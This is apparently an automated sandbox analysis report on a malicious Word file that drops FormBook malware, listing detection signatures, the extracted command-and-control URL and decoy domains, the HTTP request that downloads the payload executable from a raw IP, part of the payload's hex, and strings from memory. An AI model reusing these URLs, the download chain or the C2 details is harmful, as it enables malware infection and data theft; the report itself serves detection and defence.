Analysis Report RFL_PO 69002.doc

Overview

General Information

Sample Name: RFL_PO 69002.doc
Analysis ID: 433026
MD5: ee4431e2c986dcac3fc8078c674ba65e
SHA1: 64aa75122963e38f52739ba819788e4bfcfb3651
SHA256: 4219dd0fbae4f8d9e9964eac82293fefc6a7f1b75242473f6347daed349198a2
Tags: doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Document contains an embedded VBA macro which may execute processes
Document contains an embedded VBA macro with suspicious strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: Execution from Suspicious Folder
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates a big amount of memory (probably used for heap spraying)
Antivirus or Machine Learning detection for unpacked file
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Non Interactive PowerShell
Sigma detected: Suspicious Bitsadmin Job via PowerShell
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection:

barindex
Found malware configuration
Source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp Malware Configuration Extractor: FormBook {"C2 list": ["www.bucksnortneola.com/gw2/"], "decoy": ["kmampc.com", "swagsoldier.com", "achochapo.com", "nestymentemaestra.com", "rakuen-beans.info", "portaldainsolvencia.com", "nationaltodaytv.com", "monadiclab.com", "thebudgetfurnituredenver.com", "sifangzhouzi.com", "quangcaosonthach.com", "cbluebeltliveshop.com", "hyperrealmarketing.com", "dallasproducecompany.com", "zizhizhengshu.com", "becosyshe.com", "injectionhub.com", "wasteshelter.com", "gapegod.com", "danfrem.com", "emag.enterprises", "insomniaut.com", "margaretsboutiquenb.com", "bestmovies4k.com", "hsxytz.com", "veles.asia", "graphicoustic.com", "rzeroxi.com", "cristyleebennett.com", "vercoicsporno.club", "awdworldwide.com", "agrilast.com", "vineyardplaceseniorliving.com", "blancaholidaylets.com", "didixun.com", "localmiller.com", "gravityphysiotherapy.com", "couchtabledesktop.com", "cypresswoodsseniorliving.com", "mmdastro.com", "opportunitybsi.com", "deejspeaks.com", "alllivesmattertojesus.info", "clippingpathmask.com", "tuoitrechuatraisudoi.site", "mipecheritage.info", "acadeopolis.com", "52jnh.com", "thetrust.place", "highseachartersct.com", "booklarge.com", "kela-de.com", "ea-it-pantomath.com", "tricountyrr.com", "blackeye.online", "hidrovaco.com", "sleeplessreconnaissance.life", "newalbanyironworks.com", "scthxb.com", "bossssss.com", "isaostar.com", "pointredeem.com", "myfulfillmentproject.com", "toikawai.com"]}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Metadefender: Detection: 20% Perma Link
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe ReversingLabs: Detection: 55%
Multi AV Scanner detection for submitted file
Source: RFL_PO 69002.doc Virustotal: Detection: 15% Perma Link
Source: RFL_PO 69002.doc ReversingLabs: Detection: 21%
Yara detected FormBook
Source: Yara match File source: 00000009.00000002.434963811.000000000423B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.435299783.00000000043A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.432254547.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.491239075.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.492289476.00000000015C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.491687583.0000000000DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.488383037.0000000006130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.435204828.000000000430F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 9.2.nothinglittle.exe.423b160.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.nothinglittle.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.0.nothinglittle.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 28.2.nothinglittle.exe.400000.0.unpack, type: UNPACKEDPE
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: RFL_PO 69002.doc Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 28.0.nothinglittle.exe.400000.1.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: 28.2.nothinglittle.exe.400000.0.unpack Avira: Label: TR/Crypt.ZPACK.Gen
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: nothinglittle.exe, 0000001C.00000002.491851033.0000000001260000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: nothinglittle.exe
Source: Binary string: wscui.pdb source: explorer.exe, 0000001D.00000000.488460659.0000000006560000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior

Software Vulnerabilities:

barindex
Document exploit detected (process start blacklist hit)
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Allocates a big amount of memory (probably used for heap spraying)
Source: winword.exe Memory has grown: Private usage: 0MB later: 63MB
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\Public\Documents\nothinglittle.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 9_2_03021500
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 4x nop then pop esi 28_2_004172E4
Source: C:\Users\user\AppData\Local\Temp\nothinglittle.exe Code function: 4x nop then pop edi 28_2_00417D55
Potential document exploit detected (performs HTTP gets)
Source: global traffic TCP traffic: 192.168.2.3:49728 -> 31.210.20.45:80
Potential document exploit detected (unknown TCP traffic)
Source: global traffic TCP traffic: 192.168.2.3:49728 -> 31.210.20.45:80

Networking:

barindex
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: www.bucksnortneola.com/gw2/
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 11 Jun 2021 05:41:48 GMTServer: Apache/2.4.38 (Win64) OpenSSL/1.0.2q PHP/5.6.40Last-Modified: Thu, 10 Jun 2021 08:59:35 GMTETag: "823f0-5c4659c35de2e"Accept-Ranges: bytesContent-Length: 533488Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5e 07 69 d6 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 b0 07 00 00 4a 00 00 00 00 00 00 de cf 07 00 00 20 00 00 00 00 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 cf 07 00 53 00 00 00 00 e0 07 00 e8 46 00 00 00 00 00 00 00 00 00 00 00 fc 07 00 f0 27 00 00 00 40 08 00 0c 00 00 00 6c cf 07 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e4 af 07 00 00 20 00 00 00 b0 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e8 46 00 00 00 e0 07 00 00 48 00 00 00 b2 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 fa 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 cf 07 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 b0 07 00 8c 1e 00 00 03 00 00 00 26 00 00 06 f8 2a 00 00 e8 85 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 31 00 00 06 2a 92 02 28 01 00 00 0a 28 02 00 00 0a 02 fe 06 03 00 00 06 73 03 00 00 0a 6f 04 00 00 0a 02 03 7d 01 00 00 04 2a 1b 30 02 00 46 00 00 00 01 00 00 11 28 05 00 00 0a 72 01 00 00 70 6f 06 00 00 0a 0a 73 07 00 00 0a 0b 06 07 6f 08 00 00 0a 28 02 00 00 0a 07 6f 09 00 00 0a 6f 0a 00 00 0a 0c de 14 07 2c 06 07 6f 0b 00 00 0a dc 06 2c 06 06 6f 0b 00 00 0a dc 08 2a 00 00 01 1c 00 00 02 00 16 00 1a 30 00 0a 00 00 00 00 02 00 10 00 2a 3a 00 0a 00 00 00 00 1a 7e 02 00 00 04 2a 1e 02 80 02 00 00 04 2a 00 13 30 02 00 27 00 00 00 02 00 00 11 1f 16 0a 2b 0e 20 e8 03 00 00 28 0c 00 00 0a 06 17 59 0a 06 2d ef 73 0d 00 00 0a 6f 0e 00 00 0a 02 7b 01 00 00 04 2a 06 2a 1e 02 28 01 00 00 0a 2a 1e 02 7b 03 00 00 04 2a 22 02 03 7d 03 00 00 04 2a 1e 02 7b 04 00 00 04 2a 22 02 03 7d 04 00 00 04 2a 3e 02 16 28 0e 00 00 06 02 16 28 10 00 00 06 2a 1e 02 7b 05 00 00 04 2a 22 02 03 7d 05
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
Source: global traffic HTTP traffic detected: GET /1xBet/RFL_0769002.exe HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Thu, 10 Jun 2021 08:59:35 GMTUser-Agent: Microsoft BITS/7.8Host: 31.210.20.45
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: RFL_PO 69002.doc String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex
Source: RFL_PO 69002.doc String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.ex9
Source: PowerShell_transcript.061544._jjnsaz8.20210611074123.txt.1.dr String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe
Source: powershell.exe, 00000001.00000002.281479605.00000000031D0000.00000004.00000040.sdmp, powershell.exe, 00000001.00000002.281688658.0000000004B10000.00000004.00000040.sdmp String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exe-DestinationC:
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp String found in binary or memory: http://31.210.20.45/1xBet/RFL_0769002.exex
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460487626.000000000E7C0000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: nothinglittle.exe.9.dr String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: nothinglittle.exe.9.dr String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: nothinglittle.exe.9.dr String found in binary or memory: http://crl.comodoca.com/COMODORSAExtendedValidationCodeSigningCA.crl0
Source: explorer.exe, 0000001D.00000000.482617274.0000000004E61000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: nothinglittle.exe.9.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: nothinglittle.exe.9.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 0000001D.00000000.458516222.0000000008B46000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: nothinglittle.exe.9.dr String found in binary or memory: http://ocsp.comodoca.com0
Source: nothinglittle.exe.9.dr String found in binary or memory: http://ocsp.comodoca.com0#
Source: nothinglittle.exe.9.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 26C2BCD2-E8F6-49A5-B037-8B38394825D2.0.dr String found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000001.00000002.283225202.00000000050E1000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
Source: powershell.exe, 00000001.00000002.282599228.0000000004FA1000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.about.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 0000001D.00000000.460964779.000000000E8B3000.00000002.00000001.sdmp String found in binary or memory: http://search.daum.net/
